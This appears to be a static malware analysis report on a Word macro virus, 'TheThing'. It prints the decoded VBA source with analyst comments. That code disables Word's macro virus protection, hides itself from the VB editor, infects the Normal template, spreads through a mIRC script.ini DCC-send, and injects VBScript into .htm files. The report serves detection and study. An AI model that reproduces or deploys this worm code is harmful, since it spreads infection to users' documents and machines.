Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4312dce9b583bf02…

MALICIOUS

Office (OLE)

81.0 KB Created: 2000-07-16 04:40:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 64f2ffa27666afb9f0dfd71afdeeae66 SHA-1: 16a3a9d03651b71cf0968943f550df63859a8ecd SHA-256: 4312dce9b583bf028cd4467710bd15d37296f4a8019467c0c70fa3d252ffa474
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Word document containing VBA macros (module `ThisDocument`, self-identified in its comments as "TheThing" by "CyberShadow//SMF"). Heuristics flag Shell(), CreateObject() and GetObject(); note, however, that in the extracted source the `Shell("c:\thething.com", 6)` call appears only inside a trailing comment (`Call WriteDump("c:\"): ' rv = Shell(...)`) and the CreateObject()/GetObject() calls sit in a commented-out VBScript block, so within the previewed code these are text matches rather than statements that execute from the macro. What the live `Document_Close` handler does is better described as a macro virus/worm than a downloader: it disables Word's macro virus protection and hides the VB editor (`DisableAll`, `Stealth`, plus macros named after the built-in `ViewVBCode`/`ToolsMacro`/`FileTemplates` commands so those commands are intercepted), copies its code module into the Normal template (`infectDoc`), calls `WriteDump("c:\")` — a routine not in the preview that presumably writes `c:\thething.com`, which the macro then deletes with `Kill` — writes a mIRC `script.ini` on drives C: through H: whose `on 1:JOIN:#` remote DCC-sends `<drive>:\mirc\thething.com` to any user joining a channel (`infectMIRC`/`infect`), and prepends an HTML/VBScript copy of itself to every `*.htm*` file in the user's Documents ("Personal" shell folder) and in each directory on `%PATH%` (`infectHTMS`/`SearchForHTM`). The commented VBScript block is the HTML-side half that converts an infected `.htm` back into a Word macro. No network download is visible in the previewed code.

Heuristics 6

  • ClamAV: Doc.Trojan.TheThing-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.TheThing-9
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 63052 bytes
SHA-256: dd063b1c69659ebc2fb71044d9f89c3d7f755e43beb45aada603d573aa710509
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' [analyst] The 29 commented lines that follow are the HTML half of a dual-form
' [analyst] payload. SearchForHTM (below) strips the leading "'" from code-module
' [analyst] lines 1-29 when it writes this module into a .htm file, so there they
' [analyst] become a live <script language="VBScript"> page, while the VBA body
' [analyst] (module lines 30 .. count-3) is written out prefixed with "'" so it rides
' [analyst] inside the script as comments. The Attribute lines above are export
' [analyst] metadata that the VBE code module does not show, which is presumably
' [analyst] why these lines are 1-29 of the module. The marker strings differ by
' [analyst] one apostrophe: "'<html> <CyberShadow>" is the macro form (checked by
' [analyst] infectDoc and by Window_Onload), "<html> <CyberShadow>" is the HTML form
' [analyst] (checked by SearchForHTM). Because the scheme depends on exact line
' [analyst] positions, any inserted line — including these notes — breaks the round trip.
'<html> <CyberShadow>
'<BODY>
'<script language="VBScript"><!--
' [analyst] Runs only when the page is opened from a local file (file: protocol).
' [analyst] Its job is the inverse of SearchForHTM: turn this .htm back into a
' [analyst] Word macro living in the first template's first code module.
'Private Sub Window_Onload()
' On Error Resume Next
' If Location.protocol = "file:" Then
'  Dim FSO
' [analyst] FSO is created but not used in the visible lines.
'  Set FSO = CreateObject("Scripting.FileSystemObject")
' [analyst] Derive the on-disk path of this page from its file:/// URL.
'  HostPath = Replace(Location.href, "file:///", "")
'  HostPath = Replace(HostPath, "/", "\")
' [analyst] Try to get a Word.Application object; if that yields nothing, create
' [analyst] one and remember (Quit = 1) to shut it down at the end.
'  Set WordObj = GetObject("", "Word.Application"): Quit = 0
'  If WordObj = "" Then Set WordObj = CreateObject("Word.Application"): Quit = 1
' [analyst] Templates(1) is presumably the Normal template; NT is its first module.
'  Set NT = WordObj.Templates(1).VBProject.VBComponents(1).Codemodule
'  If NT.Lines(1, 1) <> "'<html> <CyberShadow>" Then
'   WordObj.Options.SaveNormalPrompt = False
'   NT.DeleteLines 1, NT.CountOfLines
' [analyst] Load this .htm file verbatim as the module's code, then re-comment
' [analyst] lines 1-29 (HTML) and strip the leading "'" from lines 30 .. count-3 (VBA).
'   NT.AddFromFile HostPath
''NT.NormalTemplate.Save
'   For j = 1 To 29
'    NT.ReplaceLine j, "'" + NT.Lines(j, 1)
'   Next
'   For j = 30 To NT.CountOfLines - 3
'    NT.ReplaceLine j, Mid(NT.Lines(j, 1), 2, Len(NT.Lines(j, 1)))
'   Next
'  End If
'  Set NT = Nothing
'  If Quit = 1 Then WordObj.Quit
' End If
'End Sub
' [analyst] Entry point: Word fires Document_Close when the document is closed.
' [analyst] Everything runs under On Error Resume Next, so a failing step (no mIRC
' [analyst] install, locked file, missing routine) is silently skipped.
Private Sub Document_Close()
 On Error Resume Next
 'TheThing
 'by CyberShadow//SMF
 ' [analyst] 1. Disable Word's macro virus warning, hide the VB editor, clear
 ' [analyst]    attributes on Normal.dot (DisableAll).
 Call DisableAll
 ' [analyst] 2. Copy this code module into the Normal template (infectDoc; its body
 ' [analyst]    is cut off at the end of this preview).
 Call infectDoc
 ' [analyst] 3. Write a mIRC script.ini plus thething.com on drives C: .. H:
 ' [analyst]    (infectMIRC / infect).
 Call infectMIRC
 ' [analyst] 4. WriteDump is not in this preview; from its use here and in infect()
 ' [analyst]    it presumably writes thething.com into the given directory. The
 ' [analyst]    Shell() that the heuristics flag is after the apostrophe, i.e. inside
 ' [analyst]    a comment, so it never executes from this line.
 Call WriteDump("c:\"): ' rv = Shell("c:\thething.com", 6)
 ' [analyst] 5. Delete the file from the C: root again (presumably what WriteDump wrote).
 Kill "c:\thething.com"
 ' [analyst] 6. Prepend an HTML/VBScript copy of this module to *.htm* files
 ' [analyst]    (infectHTMS / SearchForHTM).
 Call infectHTMS
 ' [analyst] Restore repainting that DisableAll switched off.
 Application.ScreenUpdating = True
End Sub
' [analyst] Picks the directories to scan for .htm files and hands each to
' [analyst] SearchForHTM. Sources: (a) the user's "Personal" (My Documents) shell
' [analyst] folder, read from HKCU\...\Explorer\Shell Folders — PrivateProfileString
' [analyst] with an empty file name is Word's idiom for a registry read; (b) every
' [analyst] directory listed in the PATH environment variable.
Private Sub infectHTMS()
 On Error Resume Next
 a = System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders", "Personal")
 Call SearchForHTM(a)
 a = Environ("PATH")
 i = 1
 ' [analyst] Hand-rolled split of PATH on ';' (Split() only arrived in later VBA
 ' [analyst] versions): accumulate characters into c until a separator, scan that
 ' [analyst] directory, then step over the ';'.
 Do While i <= Len(a)
  c = ""
  Do While i <= Len(a) And Mid$(a, i, 1) <> ";"
   c = c + Mid$(a, i, 1)
   i = i + 1
  Loop
  Call SearchForHTM(c)
  i = i + 1
 Loop
End Sub
' [analyst] A document macro whose name matches a Word built-in command runs in
' [analyst] place of that command. ViewVBCode is the command that opens the Visual
' [analyst] Basic editor, so the user's attempt to inspect the macro runs Stealth instead.
Private Sub ViewVBCode(): Stealth: End Sub
' [analyst] Intercepts the Tools > Macro command (same built-in-name mechanism as
' [analyst] ViewVBCode) so the macro list cannot be opened from this document.
Private Sub ToolsMacro(): Stealth: End Sub
' [analyst] Intercepts the File > Templates (Templates and Add-ins) command, which
' [analyst] would otherwise let the user see or detach the infected Normal template.
Private Sub FileTemplates(): Stealth: End Sub
' [analyst] Handler run in place of the three intercepted commands above. Keeps the
' [analyst] VB editor hidden (ShowVisualBasicEditor = 0) and sets EnableCancelKey to 0,
' [analyst] so Ctrl+Break no longer interrupts a running macro. Errors are swallowed.
Private Sub Stealth(): On Error Resume Next
    ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
' [analyst] Infects every *.htm* file in PathForHTM by rewriting it as
' [analyst] [this module rendered as HTML + VBScript] followed by [original contents].
' [analyst] A file whose first line already equals the HTML-form marker
' [analyst] "<html> <CyberShadow>" (no apostrophe) is left alone. Dir$ with no
' [analyst] argument continues the wildcard enumeration started by the first Dir$.
Private Sub SearchForHTM(PathForHTM)
 On Error Resume Next
 Target = Dir$(PathForHTM + "\*.htm*")
 If Target = "" Then GoTo NoHTMs
 Do
  Open PathForHTM + "\" + Target For Input As #1
  Line Input #1, a
  If a <> "<html> <CyberShadow>" Then
   ' [analyst] Buffer the original file in c. Note the rest is read with Input #
   ' [analyst] rather than Line Input #; in VBA Input # reads comma-delimited items
   ' [analyst] and strips quotes, so the original HTML can come back altered.
   c = a
   Do While Not EOF(1)
    Input #1, a
    c = c + Chr$(13) + Chr$(10) + a
   Loop
  Close #1
  Open PathForHTM + "\" + Target For Output As #1
   ' [analyst] Emit this document's first code module, flipping comment state per
   ' [analyst] line: lines 1-29 lose their leading "'" and become live HTML/<script>
   ' [analyst] text; lines 30 .. count-3 gain a "'" so the VBA body sits inside the
   ' [analyst] VBScript as comments; the last three lines are written unchanged
   ' [analyst] (presumably closing tags — they are cut off in this preview).
   ' [analyst] Empty lines are dropped (and Mid$ on an empty string raises an error
   ' [analyst] that On Error Resume Next hides).
   Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
   For i = 1 To AD.countoflines
    ca = AD.lines(i, 1)
    If i < 30 Then ca = Mid$(ca, 2, Len(ca) - 1)
    If i >= 30 And i < AD.countoflines - 2 Then ca = "'" + ca
    If ca <> "" Then Print #1, ca
   Next
  ' [analyst] Append the original page so it still renders after the injected block.
  Print #1, c
  End If
  ' [analyst] Reached on both branches: on the already-infected branch this is the
  ' [analyst] first Close of the handle opened for input above.
  Close #1
  Target = Dir$
 Loop While Target <> ""
NoHTMs:
End Sub
' [analyst] Tries drive letters C: through H: (Asc("C") + 0 .. 5). No error handler
' [analyst] here; infect() has its own, so a drive without a \mirc\ directory just
' [analyst] falls through to the next letter.
Private Sub infectMIRC()
 For i = 0 To 5
  a = Chr$(Asc("C") + i)
  Call infect(a)
 Next
End Sub
' [analyst] mIRC propagation for one drive letter a. Writes <a>:\mirc\script.ini
' [analyst] with a single remote, "on 1:JOIN:#:/dcc send $nick <a>:\mirc\thething.com":
' [analyst] whenever any user joins any channel, mIRC offers them thething.com by DCC.
' [analyst] WriteDump (not in this preview) is then called with that directory and
' [analyst] presumably writes thething.com there. On Error GoTo outta means a failed
' [analyst] Open (no mIRC on this drive) silently ends the Sub. This is the classic
' [analyst] late-1990s script.ini worm vector.
Private Sub infect(a)
 On Error GoTo outta
 a1 = a + ":\mirc\"
 Open a1 + "script.ini" For Output As #1
  Print #1, "[script]"
  Print #1, "n0=on 1:JOIN:#:/dcc send $nick " + a1 + "thething.com"
 Close #1
 dropperPath = a1
 Call WriteDump(dropperPath)
outta:
End Sub
' [analyst] Prepares Word for a silent infection of the Normal template.
' [analyst] - SetAttr ... 0 clears attribute flags (read-only etc.) on Normal.dot so
' [analyst]   it can be overwritten; NormalTemplate is used as a string here,
' [analyst]   presumably via its default Name property.
' [analyst] - VirusProtection = False turns off Word's macro warning prompt.
' [analyst] - SaveNormalPrompt = False suppresses the "save changes to Normal?" dialog,
' [analyst]   so the infected template is saved without asking.
' [analyst] - ConfirmConversions, ScreenUpdating and ShowVisualBasicEditor keep the
' [analyst]   activity off-screen.
' [analyst] Note EnableCancelKey is set True here while Stealth sets it to 0; the two
' [analyst] are not consistent with each other.
Private Sub DisableAll()
 On Error Resume Next
 SetAttr NormalTemplate.Path + "\" + NormalTemplate, 0
 With Application
  .EnableCancelKey = True
  .ScreenUpdating = False
  .ShowVisualBasicEditor = False
 End With
 With Options
  .ConfirmConversions = False
  .SaveNormalPrompt = False
  .VirusProtection = False
 End With
End Sub
Private Sub infectDoc()
 On Error Resume Next
 Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
 Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
 If NT.lines(1, 1) <> "'<html> <CyberShadow>" Then
   NT.DeleteLines 1, NT.countoflines
   NT.Insertlines 1, AD.lines(1, AD.countoflines)
 End If
 If AD.lines(1, 1) <> "'<html> <Cy
... (truncated)